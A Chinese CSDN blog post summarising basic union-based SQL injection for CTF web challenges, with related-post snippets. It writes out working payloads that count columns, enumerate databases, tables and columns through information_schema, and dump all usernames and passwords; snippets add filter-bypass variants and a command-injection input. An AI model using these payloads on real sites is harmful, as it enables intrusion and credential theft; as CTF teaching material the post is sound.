CTF刷题总结(1)------简单的SQL注入

最新推荐文章于 2024-05-12 03:58:44 发布
最新推荐文章于 2024-05-12 03:58:44 发布
阅读量1.3k 收藏 1
点赞数 1
文章标签: mysql 网络安全 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45047250/article/details/116116005
版权

第一次写分享类的文章,有错误的地方还请大家多多指正哈!此篇文章主要分享一些刷web题目中会遇到的一些知识点,之后还会继续分享一些关于这方面的知识。

文章目录

简单的sql注入

预备知识

  • schema:可以代表数据库的组织和结构,其中schema和schemata的模式可以是表、列、数据类型、关系、主键等等。下面会通过例子来说明,大家可以自行体会。
  • information_schema: 是MySQL自带的信息数据库,用于存储数据库元数据(例如:数据库名、表名等等),可以认为他包含所有的库。但是information_schema中的表实际上是视图,而不是基本表。
  • union:联合查询,将多条查询语句的结果合并成一个结果 。
  • %23:在sql语句的后面可以添加%23或者#等一些注释符,把后面的语句注释掉,有些时候可以避免一些限制。
  • group_concat():将所有能查询到的数据全部列举出来
  • group_concat(concat_ws(’:’,1,2)):用’:'分隔输出所有的数据,比如说1:2.

注入前判断

  • 判断是否有注入
  • 判断注入类型
  • 语句是否能被修改
  • 是否能被执行
  • 获取我们想要的数据
如何判断
  • 可控参数的改变能否影响页面显示结果
  • 输入的sql语句是否报错,通过报错查看sql语句痕迹

注入顺序及操作

  • 获取信息的顺序:数据库 > 表 > 字段 > 值

1.在进行注入操作前,你需要知道当前查询的字段数,只有在字段数相同时,sql语句才能查询成功,故需要猜解字段。下面将介绍俩种获取字段数的方法:

url + union select 1,2,3,4 %23/#

  • 上面的这条语句是通过联合查询获取字段数,1234即各代表一个字段,只有在字段数相同的时候才能查询成功。同时会回显出注入点(即在屏幕中显示出来的数字。)

url + order by 数字 %23/#

  • 这条语句是通过二分法来判断字段数,当数字为正确的字段数时,不会报错。

2.通过爆字段数并获取注入点之后即可开始查询了

url + union select 1,database(),version() from information_schema.schemata %23

  • 此条语句是在字段数为3且注入点在2和3的位置的情况下的,用于获取当前的数据库名以及版本号。

url + union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() %23

  • 查询当前数据库下的所有表

url + union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name=‘users’ %23

  • 此条语句是在得知当前的表名为users时查询所有的字段

url + union select 1,group_concat(concat_ws(’:’,username,password)),3 from users %23

  • 通过以上查询到的字段名查询所有的用户名和密码。

总结

一般sql注入的都不会这么简单,我也只是列举了一些基础的知识点。其中sql注入还包括整形注入、字符注入、布尔盲注、时间注入等等,有时还会有一些检测机制,这时候就需要随机应变了,在这里我推荐一个靶场,可以专门用于刷sql注入的题目-sqli labs。这个靶场需要部署在sql+php+Apache的集成软件上,有兴趣的小伙伴可以部署一下去练练手!

qq_45047250
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
CTFshow--Web2,简单SQL注入
weixin_46637933的博客
02-28 414
SQL注入先找到注入点,然后测试字段:admin' or 1=1 union select 1,2,3 <!-- 该题过滤了空格符,所以用/**/做了绕过 有回显则爆库名:admin' or 1=1 union select 1,database(),3 接着爆库内表:admin' or 1=1 union select 1,group_concat(table_name),3 form information_schema.tables where table_schema='web2'
超菜鸟级ctf
kid的博客
04-27 4743
超菜鸟级ctf 前言 大佬们为我这些菜鸟准备的ctf平台来练习(紧抱大佬的腿),特意为没打过ctf的我们准备了一些超级基础的题来开启我们的第一次ctf之旅… 一共只有6道题吧,一个半小时左右,真的是超简单,结果做的真的是… 下面凭我个人的感觉由简到难的回忆一遍吧 题目 抽屉没锁 这是一道文件上传题,也是我点开6道题后最先入手的 进到页面一看就很直接的会想文件上传漏洞,真的是第一次玩ctf,拿...
CTF-web题之简单SQL注入
qq_25046827的博客
11-24 5093
这两天闲着没事报名了学校信安和网安组织的网络安全大赛,靠着仅有的一点web知识做了几道web题,现在记录一下其中一道sql注入题的解题思路 首先题面如下 首先通过语句判断有多少个字段: 1' or 1=1 order by 4 # 1' or 1=1 order by 3 # order by是按by后面的数字或字段名所在列进行排序,如果结果集只有3列,order by4则会报错,故可以用来判断结果集的字段数 第一条语句报错,第二条语句返回 admin 5ef582761f2cafceebdfc8c
2024年网络安全最新CTF Web SQL注入专项整理(持续更新中)_ctf sql注入(1),该如何高效实用Kotlin
最新发布
2401_84302761的博客
05-12 674
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!
CTF 简单sql
明月于心的博客
07-25 1232
针对网络安全实验室 注入关该题,写一下自己的思路 打开页面 发现就一句话,那就查看下网页源代码,不查不知道,一查吓一跳,他直接告诉我们做题的思路,就是最古老的手工注入 因为他这里告诉我们 id=1,我觉得他给我们的提示,id不重要,而是后边的话重要,直接告诉我们,类似于这种题,应该怎么做。 好了 ,进入正题 那我们就开始: 那我们就在url 网址中去试,看看他有几个字段,当我们让id=4时,发...
CTF-SQL注入
weixin_44770698的博客
06-16 5033
CTF-SQL注入题目整理
CTF-实验吧简单sql注入
才不是小弱鸡的博客
05-07 1655
好吧,其实这题我也是看了wp才知道的写wp的老哥个个都是人才,脑洞很大,知识丰富,还会嘤嘤嘤,我超喜欢的。咳咳咳,跑题了,这题一看就是sql注入嘛(别问我为什么知道,自己看题目名)先进行过滤测试。先试试1 and 1=1,发现返回显然and被过滤了然后继续测试,结果发现sql语句基本上都被过滤了QAQ看wp发现这里其实是过滤后面带有空格的关键字了解这个就可以开始愉快的注入了先查一下数据库 1'/*...
ctf随笔(4) 简单sql注入
ma_nong_的博客
10-16 395
一个新闻搜索的页面,在“search news”中输入搜索的字符,可以在下列新闻匹配到相应的字符 于是就可以有两种方式尝试注入,手工注入
CTF-100题.-天天练习-学习
11-01
CTF-100题.-----------------天天练习------------------学习 100小题,试例练习
ctf-2017-release:BSidesSF CTF 2017版本
05-28
ctf-2017 2017 BSidesSF CTF面临的挑战 内置的 , , , , 在本地应对挑战 您可以使用docker在本地运行所有挑战。 docker-compose build && docker-compose up -d 挑战将在http://localhost:PORT提供,基于...
CTF-Write-up:CTF撰写和信息
03-21
4. **漏洞分析**:详细解释发现的漏洞类型及其原理,例如SQL注入、XSS跨站脚本攻击或缓冲区溢出。 5. **解题步骤**:按照时间顺序,一步步记录解决问题的过程,包括尝试的方法、遇到的困难以及解决方案。 6. **...
ctf-all-in-one
01-30
ctf-all-in-one
超微X11SPW-CTF主板用户手册
04-01
超微X11SPW-CTF主板用户手册
网安实验室CTF 注入篇
sinat_21923549的博客
03-15 2528
1.最简单SQL注入 地址:http://lab1.xseclab.com/sqli2_3265b4852c13383560327d1c31550b60/index.php 用户名输入 admin’ or ‘1’=’1 实现绕过。2.最简单SQL注入(熟悉注入环境) 地址:http://lab1.xseclab.com/sqli3_6590b07a0a39c8c27932b92b0e15
CTF-sql注入(get)
不知名白帽的博客
05-24 538
CTF-sql注入(get),实验环境:kali(192.168.20.128),靶机(192.168.20.131)。先探测敏感信息,再用owasp-zap进行漏洞扫描,然后根据漏洞类型,通过sqlmap进行漏洞的漏洞利用,再上传shell反弹权限
CTF Web简单SQL注入
RED_散的博客
09-17 929
题目链接
CTFSQL注入总结
weixin_41607190的博客
10-09 1158
第一题原理:输入一个小数,利用intval()函数返回整数的结果,使得if($_GET[id]==1024)判断不成立,执行else语句 这题我们就可以输入1024.1,intval()返回的结果就是1024,而$_GET[id]获取到的是1024.1,恰好和1024不相等 第二题原理:看!strcasecmp($pass, $query[pw])和$pass = md5($_POST[pass...
实验吧 ctf 简单sql注入3
ZweLL032的博客
03-11 6852
ctf题 现在自己还是个小白 以后慢慢做题得出思路吧
CTF实验吧-简单sql注入3【sqlmap直接跑】
Sp4rkW的博客
07-23 5183
原理内容及连接: mysql报错注入 格式:flag{} 解题链接:http://ctf5.shiyanbar.com/web/index_3.php 本来以为和1,2一样的思路,加字符来过被忽略的关键字,结果,习惯性打个0'='0就发现这题有点不对劲 hello是什么鬼!! 前面的格式/**/,/*!*/都试了试,没效果,一个硕大的单词hello仿佛在嘲笑我,然后...
CTFHub 命令注入-无过滤
07-25
CTFHub 命令注入-无过滤是一个题目,它的源代码中存在一个命令注入漏洞。在这个题目中,用户可以通过输入IP地址执行ping命令。\[1\]由于没有采用过滤,用户可以直接进行命令拼接,例如输入"192.168.43.222;ls"可以查看目录下的全部文件。\[2\]在这个题目中,flag被隐藏在网页源代码中。\[3\]为了防止命令注入漏洞,可以对用户输入进行过滤,例如过滤空格。 #### 引用[.reference_title] - *1* *2* [CTFHub -技能树 命令注入-无过滤](https://blog.csdn.net/qq_45653588/article/details/107556087)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down1,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [CTFhub——命令执行](https://blog.csdn.net/qq_43277152/article/details/113649643)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值